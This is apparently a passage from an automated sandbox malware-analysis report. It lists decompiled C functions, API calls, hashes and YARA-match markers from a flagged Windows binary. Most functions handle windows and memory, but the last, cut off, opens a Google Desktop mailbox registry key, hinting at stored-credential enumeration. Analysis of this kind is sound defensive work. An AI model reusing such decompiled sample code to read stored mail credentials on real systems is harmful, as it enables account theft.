                                                                                                                                                                    • Part of subcall function 00405E36: LoadCursorA.USER32 ref: 00405E3D
                                                                                                                                                                    • Part of subcall function 00405E36: SetCursor.USER32(00000000,?,0040BCA6), ref: 00405E44
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040A672
                                                                                                                                                                    • Part of subcall function 0040A5A1: sprintf.MSVCRT ref: 0040A5C7
                                                                                                                                                                    • Part of subcall function 0040A5A1: sprintf.MSVCRT ref: 0040A5F1
                                                                                                                                                                    • Part of subcall function 0040A5A1: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A604
                                                                                                                                                                    • Part of subcall function 0040A5A1: SendMessageA.USER32 ref: 0040A62A
                                                                                                                                                                  • SetCursor.USER32(?,?,0040B7F8), ref: 0040A697
                                                                                                                                                                  • SetFocus.USER32(?,?,?,0040B7F8), ref: 0040A6A9
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040A6C0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2210206837-0
                                                                                                                                                                  • Opcode ID: c4500f01a9179d05fffa9e4a2d537714384da649f00e33917d281301b44e2473
                                                                                                                                                                  • Instruction ID: 509cc9229267159212bead5259dcc336d8983f4e7fdf05ffa4c6fe4d4677fdd3
                                                                                                                                                                  • Opcode Fuzzy Hash: c4500f01a9179d05fffa9e4a2d537714384da649f00e33917d281301b44e2473
                                                                                                                                                                  • Instruction Fuzzy Hash: C601E9B1244604EFD326AB75CD89FA6B7E9FF48305F0544B9F15D9B271CA716E018B10
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004086DC, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                  			E004086DC(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x24));
				if(_t9 != 0) {
					_push(_t9);
					L00412096();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x34));
				if(_t10 != 0) {
					_push(_t10);
					L00412096();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
				if(_t11 != 0) {
					_push(_t11);
					L00412096();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L00412096();
						 *_t18 = 0;
					}
					_push(_t18);
					L00412096();
				}
				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
				 *((intOrPtr*)(_t19 + 0x24)) = 0;
				 *((intOrPtr*)(_t19 + 0x34)) = 0;
				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
				return _t11;
			}








                                                                                                                                                                  0x004086dc
                                                                                                                                                                  0x004086dc
                                                                                                                                                                  0x004086e5
                                                                                                                                                                  0x004086e7
                                                                                                                                                                  0x004086e8
                                                                                                                                                                  0x004086ed
                                                                                                                                                                  0x004086ee
                                                                                                                                                                  0x004086f3
                                                                                                                                                                  0x004086f5
                                                                                                                                                                  0x004086f6
                                                                                                                                                                  0x004086fb
                                                                                                                                                                  0x004086fc
                                                                                                                                                                  0x00408704
                                                                                                                                                                  0x00408706
                                                                                                                                                                  0x00408707
                                                                                                                                                                  0x0040870c
                                                                                                                                                                  0x0040870d
                                                                                                                                                                  0x00408715
                                                                                                                                                                  0x00408717
                                                                                                                                                                  0x0040871b
                                                                                                                                                                  0x0040871d
                                                                                                                                                                  0x0040871e
                                                                                                                                                                  0x00408724
                                                                                                                                                                  0x00408724
                                                                                                                                                                  0x00408726
                                                                                                                                                                  0x00408727
                                                                                                                                                                  0x0040872c
                                                                                                                                                                  0x0040872e
                                                                                                                                                                  0x00408734
                                                                                                                                                                  0x00408737
                                                                                                                                                                  0x0040873a
                                                                                                                                                                  0x00408741

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                  • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                                                                                                  • Instruction ID: 072aa514f388f074079b8f328b082be18a1f899df3a3abdece790e68ac814aea
                                                                                                                                                                  • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                                                                                                  • Instruction Fuzzy Hash: 97F0F4725057115FDB309FB99EC055BBBD5BB08714760093FF28AD3641CB79A890C618
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408742, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                  			E00408742(intOrPtr* __edi) {
				void* __esi;
				void** _t7;
				intOrPtr* _t12;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;

				_t18 = __edi;
				 *__edi = 0x414350;
				E004086DC(__edi);
				_t21 =  *((intOrPtr*)(__edi + 0x10));
				if(_t21 != 0) {
					E00406B8A(_t21);
					_push(_t21);
					L00412096();
				}
				_t22 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t22 != 0) {
					E00406B8A(_t22);
					_push(_t22);
					L00412096();
				}
				_t23 =  *((intOrPtr*)(_t18 + 8));
				if(_t23 != 0) {
					E00406B8A(_t23);
					_push(_t23);
					L00412096();
				}
				_t24 =  *((intOrPtr*)(_t18 + 4));
				if(_t24 != 0) {
					E00406B8A(_t24);
					_push(_t24);
					L00412096();
				}
				_t12 = _t18;
				_t7 =  *((intOrPtr*)( *_t12))();
				free( *_t7);
				return _t7;
			}











                                                                                                                                                                  0x00408742
                                                                                                                                                                  0x00408745
                                                                                                                                                                  0x0040874b
                                                                                                                                                                  0x00408750
                                                                                                                                                                  0x00408755
                                                                                                                                                                  0x00408757
                                                                                                                                                                  0x0040875c
                                                                                                                                                                  0x0040875d
                                                                                                                                                                  0x00408762
                                                                                                                                                                  0x00408763
                                                                                                                                                                  0x00408768
                                                                                                                                                                  0x0040876a
                                                                                                                                                                  0x0040876f
                                                                                                                                                                  0x00408770
                                                                                                                                                                  0x00408775
                                                                                                                                                                  0x00408776
                                                                                                                                                                  0x0040877b
                                                                                                                                                                  0x0040877d
                                                                                                                                                                  0x00408782
                                                                                                                                                                  0x00408783
                                                                                                                                                                  0x00408788
                                                                                                                                                                  0x00408789
                                                                                                                                                                  0x0040878e
                                                                                                                                                                  0x00408790
                                                                                                                                                                  0x00408795
                                                                                                                                                                  0x00408796
                                                                                                                                                                  0x0040879b
                                                                                                                                                                  0x0040879c
                                                                                                                                                                  0x004087a6
                                                                                                                                                                  0x004087aa
                                                                                                                                                                  0x004087b0

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086E8
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086F6
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408707
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 0040871E
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408727
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040875D
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00408770
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00408783
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00408796
                                                                                                                                                                  • free.MSVCRT(00000000), ref: 004087AA
                                                                                                                                                                    • Part of subcall function 00406B8A: free.MSVCRT(00000000,00406F4C,00000000,?,?), ref: 00406B91
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@$free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2241099983-0
                                                                                                                                                                  • Opcode ID: e4bd28fd36656b4f4febf186c9783447869cbd3f017b5df525af64530bfdf856
                                                                                                                                                                  • Instruction ID: 36c0512d224ac042a94a08cc7a852a1772878ff9935cd33c5980a4446e7632c9
                                                                                                                                                                  • Opcode Fuzzy Hash: e4bd28fd36656b4f4febf186c9783447869cbd3f017b5df525af64530bfdf856
                                                                                                                                                                  • Instruction Fuzzy Hash: 8CF0A4729025306F89313B325A01A4EB7A47D5472932A026FF90ABB3858F7D6C60C5DD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040EE8B, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 19%
                                                                                                                                                                  			E0040EE8B(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040EB15(__ecx, __ecx, __eflags);
					E0040649B(_t26,  *((intOrPtr*)(__ecx + 4)));
					L5:
					return E00401558(_t27, _a4, _a8, _a12);
				}
				if(_t11 != 0x28 || E004062DB(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);
					SetBkColor(_a8, GetSysColor(5));
					SetTextColor(_a8, 0xc00000);
					return GetSysColorBrush(5);
				}
			}







                                                                                                                                                                  0x0040ee8b
                                                                                                                                                                  0x0040ee91
                                                                                                                                                                  0x0040ee97
                                                                                                                                                                  0x0040ee99
                                                                                                                                                                  0x0040eee2
                                                                                                                                                                  0x0040eeea
                                                                                                                                                                  0x0040eef0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040eefb
                                                                                                                                                                  0x0040ee9e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040eead
                                                                                                                                                                  0x0040eeb2
                                                                                                                                                                  0x0040eec4
                                                                                                                                                                  0x0040eed2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040eeda

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004062DB: memset.MSVCRT ref: 004062FB
                                                                                                                                                                    • Part of subcall function 004062DB: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040630E
                                                                                                                                                                    • Part of subcall function 004062DB: _stricmp.MSVCRT(00000000,edit), ref: 00406320
                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0040EEB2
                                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 0040EEBA
                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0040EEC4
                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 0040EED2
                                                                                                                                                                  • GetSysColorBrush.USER32(00000005), ref: 0040EEDA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Color$BrushClassModeNameText_stricmpmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1869857563-0
                                                                                                                                                                  • Opcode ID: fb94485f195de14578bb11bb35a76f110ea5450a675464f060a1de1235fa7123
                                                                                                                                                                  • Instruction ID: 03c420b3e6d9e2244e0390b53f734bb3cf914c92d54749bbcb6c05866cd8fc50
                                                                                                                                                                  • Opcode Fuzzy Hash: fb94485f195de14578bb11bb35a76f110ea5450a675464f060a1de1235fa7123
                                                                                                                                                                  • Instruction Fuzzy Hash: 5BF08131140109BBDF116FA6EC09B9E3F69EF08712F10843AFA19641F1CB759A209B58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B21F, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E0040B21F(intOrPtr __ecx, short _a4, short _a8) {
				char _v265;
				char _v520;
				char _v532;
				RECT* _v540;
				char _v560;
				intOrPtr _v564;
				char _v568;
				intOrPtr _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t54;
				void* _t77;
				short _t85;
				short _t86;
				RECT* _t97;
				intOrPtr _t104;

				_t93 = __ecx;
				_t97 = 0;
				_t104 = __ecx;
				_v564 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t85 = _a8;
					if(_t85 == 0x9c42) {
						_t54 = DestroyWindow( *(_t104 + 0x108));
					}
					_t114 = _t85 - 0x9c49;
					if(_t85 == 0x9c49) {
						_t54 = E0040AFC4(_t93, _t97, _t104, _t114);
					}
					_t115 = _t85 - 0x9c59;
					if(_t85 == 0x9c59) {
						_t54 = E0040AF8A(_t97, _t104, _t115);
					}
					_t116 = _t85 - 0x9c56;
					if(_t85 == 0x9c56) {
						_t54 = E0040AECD(_t104, _t116);
					}
					if(_a8 == 0x9c58) {
						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
						_t54 = E0040A3E9(0, _t93, _t104, 0);
					}
					if(_a8 == 0x9c44) {
						_t54 = E0040AEB7(_t104);
					}
					if(_a8 == 0x9c43) {
						_v532 = 0x414570;
						E004019DA(_t93,  &_v520, 0x4133fc);
						E004019DA(_t93,  &_v265, 0x413438);
						_t104 = _v564;
						_push( *(_t104 + 0x108));
						_push( &_v532);
						_t77 = 0x70;
						E004014EA(_t77);
						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
						_t20 =  &_v540; // 0x414570
						_t54 = E004013E7(_t20);
						_t97 = 0;
					}
					_t86 = _a8;
					_t122 = _t86 - 0x9c41;
					if(_t86 == 0x9c41) {
						_t54 = E0040AE52(_t104, _t93, _t122);
					}
					if(_t86 != 0x9c47) {
						L23:
						__eflags = _t86 - 0x9c4f;
						if(_t86 != 0x9c4f) {
							L27:
							__eflags = _t86 - 0x9c48;
							if(_t86 == 0x9c48) {
								_t54 = E0040ADA4(_t104, _t86);
							}
							__eflags = _t86 - 0x9c45;
							if(__eflags == 0) {
								_t100 = _t104 + 0x36c;
								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
								E0040A3E9(0, _t93, _t104, __eflags);
								_t93 = 1;
								_t54 = E0040A175( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
								_t97 = 0;
								__eflags = 0;
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t54 = E0040B1AF(_t104, __eflags, _t97);
							}
							__eflags = _a8 - 0x9c5c;
							if(_a8 == 0x9c5c) {
								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
								__eflags = 0;
								E0040A3E9(0, _t93, _t104, 0);
								E0040A5A1(_t104);
								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t54 = E0040B1AF(_t104, __eflags, 1);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								_v540 = _t97;
								_v560 = 0x414028;
								E0040596A( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
								_v568 = 0x414028;
								_t54 = E004013E7( &_v560);
								_t104 = _v572;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t54 = E00408DAB( *((intOrPtr*)(_t104 + 0x370)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t54 = E00409DE2( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
							}
							goto L43;
						}
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
							_t54 = E004087BE(_t72, 0xffffffff, _t97, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x1000);
						goto L21;
					} else {
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
							_t54 = E004087BE(_t72, 0xffffffff, 2, 2);
							goto L23;
						}
						_push(0xf000);
						_push(0x2000);
						L21:
						_push(0xffffffff);
						_t54 = E004087BE(_t72);
						goto L43;
					}
				} else {
					L43:
					return _t54;
				}
			}




















                                                                                                                                                                  0x0040b21f
                                                                                                                                                                  0x0040b22e
                                                                                                                                                                  0x0040b234
                                                                                                                                                                  0x0040b236
                                                                                                                                                                  0x0040b23a
                                                                                                                                                                  0x0040b247
                                                                                                                                                                  0x0040b250
                                                                                                                                                                  0x0040b258
                                                                                                                                                                  0x0040b258
                                                                                                                                                                  0x0040b25e
                                                                                                                                                                  0x0040b263
                                                                                                                                                                  0x0040b265
                                                                                                                                                                  0x0040b265
                                                                                                                                                                  0x0040b26a
                                                                                                                                                                  0x0040b26f
                                                                                                                                                                  0x0040b271
                                                                                                                                                                  0x0040b271
                                                                                                                                                                  0x0040b276
                                                                                                                                                                  0x0040b27b
                                                                                                                                                                  0x0040b27f
                                                                                                                                                                  0x0040b27f
                                                                                                                                                                  0x0040b28a
                                                                                                                                                                  0x0040b292
                                                                                                                                                                  0x0040b298
                                                                                                                                                                  0x0040b298
                                                                                                                                                                  0x0040b2a3
                                                                                                                                                                  0x0040b2a7
                                                                                                                                                                  0x0040b2a7
                                                                                                                                                                  0x0040b2b2
                                                                                                                                                                  0x0040b2bd
                                                                                                                                                                  0x0040b2c5
                                                                                                                                                                  0x0040b2d6
                                                                                                                                                                  0x0040b2db
                                                                                                                                                                  0x0040b2df
                                                                                                                                                                  0x0040b2e9
                                                                                                                                                                  0x0040b2ec
                                                                                                                                                                  0x0040b2ed
                                                                                                                                                                  0x0040b2fe
                                                                                                                                                                  0x0040b304
                                                                                                                                                                  0x0040b308
                                                                                                                                                                  0x0040b30d
                                                                                                                                                                  0x0040b30d
                                                                                                                                                                  0x0040b30f
                                                                                                                                                                  0x0040b313
                                                                                                                                                                  0x0040b318
                                                                                                                                                                  0x0040b31c
                                                                                                                                                                  0x0040b31c
                                                                                                                                                                  0x0040b326
                                                                                                                                                                  0x0040b357
                                                                                                                                                                  0x0040b357
                                                                                                                                                                  0x0040b35c
                                                                                                                                                                  0x0040b382
                                                                                                                                                                  0x0040b382
                                                                                                                                                                  0x0040b387
                                                                                                                                                                  0x0040b38b
                                                                                                                                                                  0x0040b38b
                                                                                                                                                                  0x0040b390
                                                                                                                                                                  0x0040b395
                                                                                                                                                                  0x0040b397
                                                                                                                                                                  0x0040b39f
                                                                                                                                                                  0x0040b3a5
                                                                                                                                                                  0x0040b3b7
                                                                                                                                                                  0x0040b3b8
                                                                                                                                                                  0x0040b3bd
                                                                                                                                                                  0x0040b3bd
                                                                                                                                                                  0x0040b3bd
                                                                                                                                                                  0x0040b3bf
                                                                                                                                                                  0x0040b3c5
                                                                                                                                                                  0x0040b3ca
                                                                                                                                                                  0x0040b3ca
                                                                                                                                                                  0x0040b3cf
                                                                                                                                                                  0x0040b3d5
                                                                                                                                                                  0x0040b3dd
                                                                                                                                                                  0x0040b3e1
                                                                                                                                                                  0x0040b3e3
                                                                                                                                                                  0x0040b3e8
                                                                                                                                                                  0x0040b3fb
                                                                                                                                                                  0x0040b3fb
                                                                                                                                                                  0x0040b401
                                                                                                                                                                  0x0040b407
                                                                                                                                                                  0x0040b40d
                                                                                                                                                                  0x0040b40d
                                                                                                                                                                  0x0040b412
                                                                                                                                                                  0x0040b418
                                                                                                                                                                  0x0040b420
                                                                                                                                                                  0x0040b429
                                                                                                                                                                  0x0040b443
                                                                                                                                                                  0x0040b44a
                                                                                                                                                                  0x0040b44e
                                                                                                                                                                  0x0040b453
                                                                                                                                                                  0x0040b453
                                                                                                                                                                  0x0040b457
                                                                                                                                                                  0x0040b45d
                                                                                                                                                                  0x0040b465
                                                                                                                                                                  0x0040b465
                                                                                                                                                                  0x0040b46a
                                                                                                                                                                  0x0040b470
                                                                                                                                                                  0x0040b47e
                                                                                                                                                                  0x0040b47e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b470
                                                                                                                                                                  0x0040b35e
                                                                                                                                                                  0x0040b364
                                                                                                                                                                  0x0040b36a
                                                                                                                                                                  0x0040b37d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b37d
                                                                                                                                                                  0x0040b36c
                                                                                                                                                                  0x0040b371
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b328
                                                                                                                                                                  0x0040b328
                                                                                                                                                                  0x0040b334
                                                                                                                                                                  0x0040b352
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b352
                                                                                                                                                                  0x0040b336
                                                                                                                                                                  0x0040b33b
                                                                                                                                                                  0x0040b340
                                                                                                                                                                  0x0040b340
                                                                                                                                                                  0x0040b342
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b342
                                                                                                                                                                  0x0040b483
                                                                                                                                                                  0x0040b483
                                                                                                                                                                  0x0040b489
                                                                                                                                                                  0x0040b489

                                                                                                                                                                  APIs
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 0040B258
                                                                                                                                                                  • SetFocus.USER32(?,?,?), ref: 0040B2FE
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B3FB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                                  • String ID: pEA
                                                                                                                                                                  • API String ID: 3502187192-660962052
                                                                                                                                                                  • Opcode ID: fa249e53f08e412b2de4fab2e63f274f7ae9770adcde098fbc7ff8254fc117ce
                                                                                                                                                                  • Instruction ID: b7bc1b810a9c946c48dae79992a2e7083b23304991c1a6466db7751271d6d75f
                                                                                                                                                                  • Opcode Fuzzy Hash: fa249e53f08e412b2de4fab2e63f274f7ae9770adcde098fbc7ff8254fc117ce
                                                                                                                                                                  • Instruction Fuzzy Hash: B75186306047019BCB20BF658845E9AB3E5FF50724F54C53FF8696B2E2C7799A818B8D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405CF8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E00405CF8(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t29;
				struct HDWP__* _t30;
				RECT* _t58;
				intOrPtr _t66;

				_push(__ecx);
				_push(__ecx);
				_t66 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0x24) {
						if(_a4 == 0xf) {
							E004016E5(__ecx + 0xc);
						}
					} else {
						_t29 = _a12;
						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
					}
				} else {
					_t30 = BeginDeferWindowPos(0xb);
					_t58 = _t66 + 0xc;
					_v8 = _t30;
					E00401645(_t58, _t30, 0x3ed, 0, 0, 1);
					E00401645(_t58, _v8, 0x3ee, 0, 0, 1);
					E00401645(_t58, _v8, 0x3f4, 0, 0, 1);
					E00401645(_t58, _v8, 0x3ef, 0, 0, 1);
					E00401645(_t58, _v8, 0x3f0, 1, 0, 0);
					E00401645(_t58, _v8, 0x3f1, 1, 0, 0);
					E00401645(_t58, _v8, 0x3f5, 1, 0, 0);
					E00401645(_t58, _v8, 0x3f2, 1, 0, 0);
					E00401645(_t58, _v8, 0x3f3, 1, 1, 0);
					E00401645(_t58, _v8, 1, 1, 1, 0);
					E00401645(_t58, _v8, 2, 1, 1, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t58 + 0x10), _t58, 1);
					_t66 = _v12;
				}
				return E00401558(_t66, _a4, _a8, _a12);
			}










                                                                                                                                                                  0x00405cfb
                                                                                                                                                                  0x00405cfc
                                                                                                                                                                  0x00405d03
                                                                                                                                                                  0x00405d05
                                                                                                                                                                  0x00405d08
                                                                                                                                                                  0x00405dfd
                                                                                                                                                                  0x00405e16
                                                                                                                                                                  0x00405e1b
                                                                                                                                                                  0x00405e1b
                                                                                                                                                                  0x00405dff
                                                                                                                                                                  0x00405dff
                                                                                                                                                                  0x00405e02
                                                                                                                                                                  0x00405e09
                                                                                                                                                                  0x00405e09
                                                                                                                                                                  0x00405d0e
                                                                                                                                                                  0x00405d11
                                                                                                                                                                  0x00405d19
                                                                                                                                                                  0x00405d27
                                                                                                                                                                  0x00405d2d
                                                                                                                                                                  0x00405d3f
                                                                                                                                                                  0x00405d51
                                                                                                                                                                  0x00405d63
                                                                                                                                                                  0x00405d75
                                                                                                                                                                  0x00405d87
                                                                                                                                                                  0x00405d99
                                                                                                                                                                  0x00405dab
                                                                                                                                                                  0x00405dbd
                                                                                                                                                                  0x00405dcb
                                                                                                                                                                  0x00405dda
                                                                                                                                                                  0x00405de2
                                                                                                                                                                  0x00405ded
                                                                                                                                                                  0x00405df3
                                                                                                                                                                  0x00405df6
                                                                                                                                                                  0x00405e33

                                                                                                                                                                  APIs
                                                                                                                                                                  • BeginDeferWindowPos.USER32(0000000B), ref: 00405D11
                                                                                                                                                                    • Part of subcall function 00401645: GetDlgItem.USER32 ref: 00401655
                                                                                                                                                                    • Part of subcall function 00401645: GetClientRect.USER32 ref: 00401667
                                                                                                                                                                    • Part of subcall function 00401645: DeferWindowPos.USER32 ref: 004016D1
                                                                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 00405DE2
                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 00405DED
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                  • String ID: $
                                                                                                                                                                  • API String ID: 2498372239-3993045852
                                                                                                                                                                  • Opcode ID: a57de8c45b3456a0d8c08563bdb03b3f45c34c184d4faa9fce82ec50ca54258b
                                                                                                                                                                  • Instruction ID: 9c87de9d9a27f98487306a7e65f23cb02f8420b0a21639e15617240473fc85a4
                                                                                                                                                                  • Opcode Fuzzy Hash: a57de8c45b3456a0d8c08563bdb03b3f45c34c184d4faa9fce82ec50ca54258b
                                                                                                                                                                  • Instruction Fuzzy Hash: CC314C30641254BBCB216F678C4DD8F7E7DEF86BA8F104479B406752A2D6758E00DAA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407306, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00407306(void* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				char _v264;
				void* _v268;
				void* _v276;
				long _t17;
				void* _t21;
				void* _t24;
				void* _t29;
				int _t32;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t41;

				_t29 = __ecx;
				_t17 = E0040F1B0(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
